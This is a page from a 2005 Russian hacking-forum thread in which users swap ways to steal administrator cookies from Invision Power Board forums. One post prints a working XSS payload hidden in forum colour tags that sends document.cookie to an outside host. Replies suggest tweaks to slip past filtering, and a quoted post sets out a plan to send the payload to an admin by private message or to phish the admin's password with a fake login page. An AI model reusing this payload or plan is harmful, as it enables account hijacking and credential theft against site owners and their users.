ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 12.03.2005, 17:26
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

(-=util=-)
1)а свой сниффер я как намучу?
2)а универсальных фишек нет,для большенства браузеров?Мне говорили,что видео идёт на всех,но у меня не выходило,напишите пажаласта полный код(например для форума www.vasyapup.com/forum)
 
Ответить с цитированием

  #42  
Старый 12.03.2005, 17:58
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

сейчас опубликую исходник снифера (готовый) в разделе

Delphi, С/С++, C#, JavaScript
 
Ответить с цитированием

  #43  
Старый 12.03.2005, 22:05
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

Увидел,скачал.И у меня есть вопросы:
1)Если я его на народ загружу он пахать будет?
2)не грузится файл .htaccess.Он должен грузиться?
3)зачем тама ссыла"СНИФЕР (картинка)".Нажимаешь,а картинку невозможно открыть...
4)код красного цвета для IPB для всех версий?
5)зачем 2.jpg?
я мало в этом понимаю поэтому много вопросов...

Последний раз редактировалось FRTD; 12.03.2005 в 22:29..
 
Ответить с цитированием

  #44  
Старый 12.03.2005, 22:37
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

http://forum.antichat.ru/showthread.php?p=31012 Пояснил
Все твои ошибки из-за того что народ неподходит.
 
Ответить с цитированием

  #45  
Старый 12.03.2005, 23:12
advlam
Новичок
Регистрация: 11.03.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию

пишу я в форуме 1.3.1, как указано в доке к сниферу -=util=-:
Код:
[color=]` style=background:url(javascript:document.images[12].src="http://style-life.biz/onelinetoolz/sn/me.jpg?"+document.cookie) [/color]
не проканывает, в форуме отображается как:
Код:
'>` style=background:url(javascript:document.images[12].src="http://style-life.biz/onelinetoolz/sn/me.jpg?"+document.cookie)

Последний раз редактировалось advlam; 12.03.2005 в 23:16..
 
Ответить с цитированием

  #46  
Старый 12.03.2005, 23:55
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

1. Работает в IE и в большенстве форумов 100% работает в плоть до версий 2.0.Х.
2. Если только админы не гении и сами незакрыли дыру. Незнаю патч есть или нет.
3. Попробуй в др. форумах. Попробуй images[12]. заменить на images[0]. Попробуй [color= заменить на [video=
и т.д........
 
Ответить с цитированием

  #47  
Старый 13.03.2005, 00:09
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

(-=util=-)
вощем мне не светит свой снифф поиметь
 
Ответить с цитированием

  #48  
Старый 28.03.2005, 20:58
chip
Познающий
Регистрация: 05.03.2005
Сообщений: 89
Провел на форуме:
0

Репутация: 3
По умолчанию

мля меня ташнит. =(
 
Ответить с цитированием

  #49  
Старый 28.03.2005, 21:42
hacsoft
Познающий
Регистрация: 14.03.2005
Сообщений: 43
Провел на форуме:
59867

Репутация: 2
Отправить сообщение для hacsoft с помощью ICQ
По умолчанию

Цитата:
Сообщение от (-=util=-)  
1. делаешь свой снифер (чтобы без всяких подписок) Используешь баг с спаренными тэгами (т.е. пихаешь админу в ПМ снифер). И ждёшь когда прилетят к тебе куки. Потом редактируешь свои.
2. (если куки непришли) Спомощью тех же тэгов делаешь пересылку на свою страницу в ПМ админу. А на своей странице точная копия того форума (одна страница ошибки авторизации) Но в теле этой страницы ввод пароля и логина придёт к тебе на ящик.
Покрайней мере у меня работало =)
P.S. Это для MyIE и IE
Ну этого не достаточно. Еще бы надо, что бы админ был ламер. А то поймет и пасс поменяет
 
Ответить с цитированием

  #50  
Старый 28.03.2005, 21:46
hacsoft
Познающий
Регистрация: 14.03.2005
Сообщений: 43
Провел на форуме:
59867

Репутация: 2
Отправить сообщение для hacsoft с помощью ICQ
По умолчанию

Цитата:
Сообщение от FRTD  
(-=util=-)
вощем мне не светит свой снифф поиметь
А на этот счет я всегда так говорю: прежде чем что-то ломать, выучи необходимый минимум (хотя бы поверхностно): HTML, CSS, JavaScript, PHP, MySQL, можно Perl (не обязательно, признаю, я его сам не сильно знаю).
А то только видео и подавай, что бы показать, куда нажать и сразу пасс получить.

P.S. (оффтоп, простите). Случай: одим ламхакер хотел phpbb2 ломануть. Так вот он по видео с этого сайта и пробует. Прикол в том, что на том форуме первый пользователь не был админом (ну так получилось). Так он и голову ломал потом, почему ссылки нет на панель админа. Т.е. мозги вообще не шевелятся, не понимая даже почему тот метод взлома работает пытается его использовать по стандартному шаболону, а тут тебе рас и не шаблонная ситуация и крутой хакер превращается в судрожно бьющуюся рыбу на берегу (т.е. ламера)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Форумы 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ